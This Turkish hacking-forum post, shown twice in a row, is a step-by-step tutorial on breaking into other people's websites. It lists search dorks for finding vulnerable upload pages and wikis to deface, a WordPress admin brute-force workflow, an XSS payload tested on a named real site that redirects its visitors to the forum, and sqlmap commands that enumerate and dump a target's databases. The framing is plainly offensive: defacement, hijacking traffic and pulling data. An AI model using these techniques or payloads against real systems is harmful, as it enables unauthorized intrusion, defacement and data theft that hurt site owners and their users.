Arkadaşlar Merhaba , Bu Lafı Her Konuda 1 Kez Görmüşsünüzdür Ancak Ben Kesin Diyorum "Bu Konu İle İlgili Çok Araştırdım Forumda , Bazıları İsimlerini vermiş ancak Nasıl Yapıldığını Dememiş ve ya Tam Aksine ve ya İndirme Linklerini Vermemiş vbs." Bu Konuda Herşeyi Anlatıcam :
NOT : Uluslararası İnterpol Siber Güvenlik Ekibinden Olmadığım için Bazı Hatalarım Ola Bilir , Anlayışla Karşılayınız :
Kolaydan Zora Doğru Anlatacağım ...
1-) Upload Açığı
Bu Açığı Bilmeden Direk SQL vbs. Geçen Kişi Tanımıyorum : , Normalde Bununla İlgili Onlarca Dork Mevcut Ancak En Sağlamı Benim Vereceğim Dorkdur :
Dorkumuz : intitle:"Powered by Phuploader"
Bunu İnternette Aratıyoruz ve Karşımıza Gelen Bir Siteye Giriyoruz ...
Karşımıza Gelen Sayfalardan 2 - 10 Arası Dosya Seç Butonu Olacaktır İlk Butona İndex ve ya Resim Ekliyoruz ve Soldaki Gönder Butonuna Basıyoruz ...
Siteye Zarar Verirmi ? : Hayır , Bunu HızlıResime Resim Yüklemek Gibi Düşünün Sadece Zone Kasmamızda İşe Yaraya Bilir ...
2-) Waka Wikii Açığı
Bu Açıkta Siteye Zarar Vermez Ancak Yeni Gelen Misafirlere Hediye Burakmış Oluruz : , Dorkumuzu Arattıktan Sonra Bir Siteye Giriyoruz ve Editleyeceğimiz Yere Çift Tıklıyoruz ...
Dork : wakka.php?wiki=
İstediğimiz Yazıyı Yazıyoruz ... Sonra Aşağıdaki Butona Basıyoruz ve Sitemiz Yenileniyor ...
Sansürlediğimiz Yerler Başka Bir Forumdu , Önceden Başka Birisi Uğramış Siteye :
Siteye Zarar Verirmi ? : Hayır , Sadece Zone Kasa Bilirsiniz ...
3-) Brute Force ( Kaba Kuvvet )
Bu Bir Açık Değil , Aramamotoru İle Çektiğimiz Sitelerin Üzerinde Belirlenen Admin:Şifre Listesini Denetler ve Olumlu Sonuçları Bize Gösterir
Öncelikle Dork Oluşturalım:
Benim Oluşturacağım Dork ( /wp-content/plugins/ ) Olacaktır ...
Dork Oluşturmanın Püf Noktası: Kimsenin Aklına Gelmeyecek Yazılar Yazmak , Örn.( Deep , Last , Send ) Daha Fazla Hits Düşer ...
Şimdi Bunu Arama Motorumuzda Denetleyelim ...
(1) Butonuna Basıyoruz
(2) Dorklarımızı Yapıştırıyoruz
(3) Tarama Kısımına Geçiyoruz
(4) Taramayı Başlatıyoruz
(5) Kaydediyoruz ...
"Brute Force"ye Giriyoruz ...
En Alttaki Siyah Yazılara Tıklıyoruz
Site List - Admin - Pass = .txt lerimizi Ekliyoruz ...
Brute Forceyi Başlatıyoruz (+)
Düşen Hitsler ( " Good Accounts " ) Gözükecektir.
17% Oldu Daha 0 Site Düştü Onlarında Tema Edit Kapalı , O Yüzden Shell Basmayı , Mass Basmayı ve Config Çekmeyi Anlatamıyorum ... Yeni Bir Konuda Anlatırım :
4-) XSS Açığı
Bu Açık Eskiden En Fazla Kullanılan Açıklardandı , Şu Dönemler Çokta Kullanılmıyor ...
Dorkumuzu İnternette Aratıyoruz : index.php?id=
Karşımıza Çıkacak Sitelerden Birisine Giriyoruz , Örnek.(Welcome to CAcert.org)
Bu Sitede xxxxxxxx/index.php?id= Den Sonraki Herşeyi Siliyoruz ... Bu Şekilde.(Welcome to CAcert.org)
Şimdi URL Sonuna <script>alert(Herorahim);</script>
Yazıyoruz , Örnek.(http://www.cacert.org/index.php?id=<script>alert(Herorahim);</script> )
Önümüze Hata Gelirse Sitede XSS Açığından Yararlandık Demektir , Eğer Gelmediyse Bunu Yorum - Arama Kutusu - İletişim Kısımına vbs. Deneyin ...
Bu Ne İşimize Yarayacak ? : Siteye Yönlendirme Ekleyerek Kendi Sitemize Üye Çeke Biliriz ...
Tek Yapmamız Gereken = ?id= Sonuna <script>****************.href= www.turkhackteam.org</script>
Eklemek Olacaktır...
Not : Her Sitede 100% XSS Açık Olacak Diye Birşey Yok :
5-) SQL Açığı
En Fazla Kullanılan Açıktır ve Çok Sağlam Zararlar Vura Biliriz Siteye :
SQL Açığından Havij , SQLMap , vbs. Programlarla Yararlana Biliriz , Ben Size SqlMap Üzerinde Anlatacağım ..
İlk Önce
Kodumuzu Giriyoruz , Sonrasında Database Çekiyoruz ...
Karşımızda Aşağılarda " available_database " Olacaktır , Onun Altındakiler Bizim Databaselerimiz ..
Sonrasında İstediğimiz Databaseden Veri Çekmeye Başlıyoruz ...
tablesden Önce iki adet - Olacaktır ...
Sonrasında Veriler Çekilecektir ( Bu Biraz Sürüyor )
Çekilen Verilerin Kolonlarını Görmek İçin
Not: Burdada Dumpdan Önce iki adet - Olacaktır
ve Belirlediğimiz Kolonun Datası Çekiliyor ...
Sonuç Bu Şekilde Olacaktır ...
SqlMap İndirme Linki : sqlmap: automatic SQL injection and database takeover tool
Arkadaşlar Konuya 2 Saat Civarı Emek Verdim ... Lütfen Bir Teşekkürü Çok Görmeyin :
NOT : Uluslararası İnterpol Siber Güvenlik Ekibinden Olmadığım için Bazı Hatalarım Ola Bilir , Anlayışla Karşılayınız :
Kolaydan Zora Doğru Anlatacağım ...
1-) Upload Açığı
Bu Açığı Bilmeden Direk SQL vbs. Geçen Kişi Tanımıyorum : , Normalde Bununla İlgili Onlarca Dork Mevcut Ancak En Sağlamı Benim Vereceğim Dorkdur :
Dorkumuz : intitle:"Powered by Phuploader"
Bunu İnternette Aratıyoruz ve Karşımıza Gelen Bir Siteye Giriyoruz ...
Karşımıza Gelen Sayfalardan 2 - 10 Arası Dosya Seç Butonu Olacaktır İlk Butona İndex ve ya Resim Ekliyoruz ve Soldaki Gönder Butonuna Basıyoruz ...
Siteye Zarar Verirmi ? : Hayır , Bunu HızlıResime Resim Yüklemek Gibi Düşünün Sadece Zone Kasmamızda İşe Yaraya Bilir ...
2-) Waka Wikii Açığı
Bu Açıkta Siteye Zarar Vermez Ancak Yeni Gelen Misafirlere Hediye Burakmış Oluruz : , Dorkumuzu Arattıktan Sonra Bir Siteye Giriyoruz ve Editleyeceğimiz Yere Çift Tıklıyoruz ...
Dork : wakka.php?wiki=
İstediğimiz Yazıyı Yazıyoruz ... Sonra Aşağıdaki Butona Basıyoruz ve Sitemiz Yenileniyor ...
Sansürlediğimiz Yerler Başka Bir Forumdu , Önceden Başka Birisi Uğramış Siteye :
Siteye Zarar Verirmi ? : Hayır , Sadece Zone Kasa Bilirsiniz ...
3-) Brute Force ( Kaba Kuvvet )
Bu Bir Açık Değil , Aramamotoru İle Çektiğimiz Sitelerin Üzerinde Belirlenen Admin:Şifre Listesini Denetler ve Olumlu Sonuçları Bize Gösterir
Öncelikle Dork Oluşturalım:
Benim Oluşturacağım Dork ( /wp-content/plugins/ ) Olacaktır ...
Dork Oluşturmanın Püf Noktası: Kimsenin Aklına Gelmeyecek Yazılar Yazmak , Örn.( Deep , Last , Send ) Daha Fazla Hits Düşer ...
Kod:
/wp-content/plugins/hits
/wp-content/plugins/last
/wp-content/plugins/send
/wp-content/plugins/note
/wp-content/plugins/climb
/wp-content/plugins/sorry
/wp-content/plugins/gear
/wp-content/plugins/nothing
/wp-content/plugins/all
/wp-content/plugins/after
(1) Butonuna Basıyoruz
(2) Dorklarımızı Yapıştırıyoruz
(3) Tarama Kısımına Geçiyoruz
(4) Taramayı Başlatıyoruz
(5) Kaydediyoruz ...
"Brute Force"ye Giriyoruz ...
En Alttaki Siyah Yazılara Tıklıyoruz
Site List - Admin - Pass = .txt lerimizi Ekliyoruz ...
Brute Forceyi Başlatıyoruz (+)
Düşen Hitsler ( " Good Accounts " ) Gözükecektir.
17% Oldu Daha 0 Site Düştü Onlarında Tema Edit Kapalı , O Yüzden Shell Basmayı , Mass Basmayı ve Config Çekmeyi Anlatamıyorum ... Yeni Bir Konuda Anlatırım :
4-) XSS Açığı
Bu Açık Eskiden En Fazla Kullanılan Açıklardandı , Şu Dönemler Çokta Kullanılmıyor ...
Dorkumuzu İnternette Aratıyoruz : index.php?id=
Karşımıza Çıkacak Sitelerden Birisine Giriyoruz , Örnek.(Welcome to CAcert.org)
Bu Sitede xxxxxxxx/index.php?id= Den Sonraki Herşeyi Siliyoruz ... Bu Şekilde.(Welcome to CAcert.org)
Şimdi URL Sonuna <script>alert(Herorahim);</script>
Yazıyoruz , Örnek.(http://www.cacert.org/index.php?id=<script>alert(Herorahim);</script> )
Önümüze Hata Gelirse Sitede XSS Açığından Yararlandık Demektir , Eğer Gelmediyse Bunu Yorum - Arama Kutusu - İletişim Kısımına vbs. Deneyin ...
Bu Ne İşimize Yarayacak ? : Siteye Yönlendirme Ekleyerek Kendi Sitemize Üye Çeke Biliriz ...
Tek Yapmamız Gereken = ?id= Sonuna <script>****************.href= www.turkhackteam.org</script>
Eklemek Olacaktır...
Not : Her Sitede 100% XSS Açık Olacak Diye Birşey Yok :
5-) SQL Açığı
En Fazla Kullanılan Açıktır ve Çok Sağlam Zararlar Vura Biliriz Siteye :
SQL Açığından Havij , SQLMap , vbs. Programlarla Yararlana Biliriz , Ben Size SqlMap Üzerinde Anlatacağım ..
İlk Önce
Kod:
cd sqlmap
Kod:
sqlmap.py -u www.örnek.com/index.php?id=5 --dbs
Sonrasında İstediğimiz Databaseden Veri Çekmeye Başlıyoruz ...
Kod:
sqlmap.py -u www.örnek.com/index.php?id=5 -D Databaseismi --tables
Sonrasında Veriler Çekilecektir ( Bu Biraz Sürüyor )
Çekilen Verilerin Kolonlarını Görmek İçin
Kod:
sqlmap.py -u www.örnek.com/index.php?id=1 -D Databaseismi -T veriadı -C kolon1,kolon2,kolon3 --dump
Not: Burdada Dumpdan Önce iki adet - Olacaktır
ve Belirlediğimiz Kolonun Datası Çekiliyor ...
Sonuç Bu Şekilde Olacaktır ...
SqlMap İndirme Linki : sqlmap: automatic SQL injection and database takeover tool
Arkadaşlar Konuya 2 Saat Civarı Emek Verdim ... Lütfen Bir Teşekkürü Çok Görmeyin :